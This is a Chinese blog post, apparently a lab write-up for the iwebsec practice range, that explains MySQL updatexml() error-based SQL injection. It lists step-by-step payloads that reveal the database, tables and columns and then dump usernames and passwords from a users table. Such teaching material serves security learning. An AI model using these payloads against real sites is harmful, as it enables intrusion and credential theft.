iwebsec-updatexml报错注入

拾柒SHY

已于 2025-03-20 17:17:37 修改

阅读量520

点赞数 7

CC 4.0 BY-SA版权

分类专栏：网络空间安全文章标签：网络安全 sql

于 2025-03-18 11:15:09 首次发布

本文链接：https://blog.youkuaiyun.com/m0_60984906/article/details/146335265

网络空间安全专栏收录该内容

9 篇文章

订阅专栏

原理分析

Updatexml()函数“updatexml(XML_document, XPath_string, new_value);”

参数	描述
XML_document	String格式，为XML文档对象的名称，文中为Doc
XPath_string	Xpath格式的字符串
new_value	String格式，替换查找到的符合条件的数据

即sql语句为“select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1”
concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，爆出用户
0x7eASCII码，实为~，upadtexml()报错信息为特殊字符、字母及之后的内容，为了前面字母丢失，开头连接一个特殊字符~

实战注入

1.判断是否存在漏洞，添加and 1=1# 页面正常回显，and 1=2# 页面回显异常，即存在sql注入漏洞

2.爆出数据库

id=1 and (updatexml(1,concat('~',(select database())),3))#

3.爆出表

id=1 and (updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schame=database())),3))#

4.爆出users表字段

id=1 and (updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')),3))#

5.爆数据

id=1 and (updatexml(1,concat('~',(select group_concat(username,',',password) from users)),3))#

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

拾柒SHY

关注关注

7
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

iwebsec--sql注入漏洞

追求卓越，技术流~

11-20

1961

sql注入漏洞

SQL注入之floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错

m0_50917178的博客

12-09

4284

文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题前言本文为作者的学习笔记，主要介绍了floor注入原理，利用注入代码（payload）分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境，并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。提示：以下是本篇文章正文内容，下面案例可供参考一、什么是

参与评论您还未登录，请先登录后发表或查看评论

新手小白入门——SQL注入之报错注入

2401_89233381的博客

12-08

2993

主要利用数据库在执行某些函数或语句时产生的错误信息来获取数据。这种方法通常在目标系统对常规的SQL注入进行了一定防范（如过滤了常见的注入关键字等）的情况下使用。在MySQL中常见select/insert/update/delete/extratvalue注入可以使用报错方式来获取信息。updatexml()注入insert注入数据注入update注入delete注入extractvalue()注入。

MYSQL updatexml()函数报错注入解析

09-09

主要介绍了MYSQL updatexml()函数报错注入解析，并且简单介绍了updatexml函数，具有一定参考价值，需要的朋友可以了解下。

updatexml()报错注入

最新发布

haishiqiguai的博客

04-28

1242

报错注入（Error-based SQL Injection）是一种通过故意触发数据库错误，并利用错误信息中泄露的敏感数据来实施攻击的SQL注入技术。其核心原理是利用数据库的异常处理机制，将攻击者需要的数据嵌入错误信息中返回。

updatexml报错注入

q1314q520q的博客

08-12

719

updatexml报错注入的使用。

SQL注入漏洞 | updatexml报错注入

weixin_52116519的博客

12-09

1200

XMLXML 被设计用来传输和存储数据，是各种应用程序之间进行数据传输的最常用的工具。xpathXPath 是一门在 XML 文档中查找信息的语言。XPath 使用路径表达式来选取 XML 文档中的节点或者节点集。这些路径表达式和我们在常规的电脑文件系统中看到的表达式非常相似。语法格式第一个参数：XML_document是String格式，为XML文档对象的名称第二个参数：XPath_string ，代表路径，Xpath格式的字符串，例如。

记一次简单的 updatexml报错注入

cxk

03-24

2239

朋友发的，问怎么注入有大佬发了，报错注入。那就来锤他 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc 第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。第三个参数：new_value...

iwebsec靶场SQL注入-sleep注入

qq_56041380的博客

03-26

431

sleep注入是另一种盲注方式，与bool注入不同，sleep注入没有任何报错信息输出，页面返回不管对错都只是一种状态，攻击者无法通过页面返回状态来判断输入的SQL注入测试语句是否正确，只能通过构造sleep注入的SQL测试语句，根据页面返回的返回时间判断数据库中存储了哪些信息

iwebsec靶场SQL注入-bool盲注

qq_56041380的博客

03-24

531

bool注入是盲注的一种。它于报错注入不同，布尔注入没有任何报错信息输出，页面返回只有正常和不正常两种状态，攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确，从而判断数据库中存储了那些信息。

iwebsec靶场SQL注入漏洞-字符型注入

02-24

### 关于iwebsec靶场中字符型SQL注入漏洞分析在探讨iwebsec靶场中的字符型SQL注入漏洞时，需理解其核心在于利用特定字符串构造来绕过输入验证机制并执行恶意查询。当应用程序未能正确处理特殊字符或未对用户输入做...

sqli-labs less-17 updatexml()报错注入

cuddlylm的博客

04-02

1803

这题相比前面的11到15关由原来的登陆注册框变成了现在的重置密码框首先阅读源码发现该题先审查user name的值，只有当user name的值是真值的时候才会处理下一步的new password 重点引入了update函数 $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; 这个函数的作用就是更新数据库 updatexml()函数 UPDATEXML (XML_document, XPath_string,.

SQL报错注入之updatexml

2301_78549931的博客

08-05

2806

第一个参数：XML的内容第二个参数：是需要update的位置XPATH路径第三个参数：是更新后的内容所以第一和第三个参数可以随便写，只需要利用第二个参数，他会校验你输入的内容是否符合XPATH格式，当我们输入一个不符合xpath语法的语句就报错了，我们注入利用的就是这一点。

【sqli-labs】Less 5——报错注入（updatexml()函数）

用博客做做记录的小白

06-23

2928

sqli-labs靶场第五关less 5，使用报错注入函数updatexml()进行报错注入，注入类型为单引号字符型。

sql盲注_updateXml报错注入

sugar_by的博客

06-03

597

函数updatexml(XML_document,XPath_string,new_value)包含三个参数第一个参数是string格式，为XML文档对象名称，例如doc 第二个参数是路径第三个参数是替换查找符合条件的数据 updatexml报错原理同extractvalue()一样sql盲注_extractvalue报错注入输入错误第二个参数，即更改路径的符号正常语句错误语句利用updatexml()报错注入判断字符型/数据型判断闭合方式可以判断为双引号闭合查看有多少列查询数据

sqli-labs-报错注入-updatexml报错

weixin_51706044的博客

03-14

1481

文章目录前言一、updatexml报错二、updatexml报错记忆前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入: 有些网站在开发调试阶段开启了报错提示信息,如果没有关闭,就有可能存在报错注入. 报错注入函数: floor函数 extractvalue报错 updatexml报错今天我在这里先记录一下对于updatexml报错函数的学习一、updatexml报错基本格式: ?id=

报错注入updatexml函数使用

weixin_43326436的博客

06-03

4064

一. floor()、extractvalue()、updatexml() 函数都是与报错注入有关二.updatexml函数使用方式: UPDATEXML (XML_document, XPath_string, new_value); 第一个参数：XML_document是String格式，为XML文档对象的名称。第二个参数：XPath_string (Xpath格式的字符串) 。第三个参数：new_value，String格式，替换查找到的符合条件的数据作用：改变文档中符合条件的节点的值。还

报错注入（extractvalue,updatexml)

m0_73477772的博客

05-10

824

但是我们将第二个参数的斜杠替换为另外的符号extractvalue（doc,'~book/author/surname')例如：concat(1，2）的作用是将1，2两个位置的数据拼接起来，0x7e是’~‘的ascll码。这时候我们在第二个参数的位置加入SQL语句，则会返回我们想要的信息。第三个参数：new_value,string格式，替换查找到的符合条件的数据。第一个参数doc XML文档对象名称，第二个参数'____' 路径。如果我们把第二个参数的路径拼写错误，它会查不到内容但不会报错。